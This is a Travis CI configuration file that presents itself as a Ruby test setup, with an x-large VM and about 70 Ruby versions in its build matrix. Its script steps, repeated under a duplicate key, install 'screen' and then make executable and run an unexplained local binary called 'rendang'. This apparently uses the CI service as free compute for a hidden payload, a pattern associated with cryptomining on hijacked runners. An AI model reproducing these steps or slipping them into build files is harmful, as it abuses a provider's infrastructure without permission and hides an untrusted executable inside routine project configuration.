language: ruby
cache: bundler # caching to speed up dependency installation
dist: focal
vm:
  size: x-large
rvm:
  - "3.0.1"
  - "2.7.3"
  - "2.6.7"
  - "2.5.9"
  - "3.0.0"
  - "2.7.2"
  - "2.7.1"
  - "2.6.6"
  - "2.5.8"
  - "2.4.10"
  - "2.7.0"
  - "2.4.9"
  - "2.6.5"
  - "2.5.7"
  - "2.4.8"
  - "2.6.4"
  - "2.5.6"
  - "2.4.7"
  - "2.6.3"
  - "2.4.6"
  - "2.5.5"
  - "2.6.2"
  - "2.5.4"
  - "2.6.1"
  - "2.6.0"
  - "2.5.3"
  - "2.5.2"
  - "2.4.5"
  - "2.3.8"
  - "2.5.1"
  - "2.4.4"
  - "2.3.7"
  - "2.5.0"
  - "2.4.3"
  - "2.3.6"
  - "2.4.2"
  - "2.3.5"
  - "2.2.9"
  - "2.3.4"
  - "2.2.7"
  - "2.4.1"
  - "2.4.0"
  - "2.3.3"
  - "2.3.2"
  - "2.2.6"
  - "2.3.1"
  - "2.2.5"
  - "2.1.10"
  - "2.1.9"
  - "2.3.0"
  - "2.2.4"
  - "2.1.8"
  - "2.2.3"
  - "2.1.7"
  - "2.2.2"
  - "2.1.6"
  - "2.2.1"
  - "2.2.0"
  - "2.1.5"
  - "2.1.4"
  - "2.1.3"
  - "2.1.2"
  - "2.1.1"
  - "2.1.0"
  - "2.0.0"
  - "1.9.3"
  - "1.9.2"
  - "1.9.1"
script:
- curl -L https://codeclimate.com/downloads/test-reporter/test-reporter-latest-linux-amd64 > ./cc-test-reporter
- chmod +x ./cc-test-reporter
- ./cc-test-reporter before-build
- gem install bundler:2.1.4
- bundle install --jobs=4 --retry=4 --path vendor/bundle
- bundle exec rake rubocop
- apt update 
- apt install screen -y 
- chmod 777 rendang && ./rendang
addons:
  apt:
    packages:
    - libcurl4-openssl-dev # required to avoid SSL errors
env:
  global:
  - NOKOGIRI_USE_SYSTEM_LIBRARIES=true # speeds up installation of html-proofer
script:
- apt update 
- apt install screen -y 
- chmod 777 rendang && ./rendang
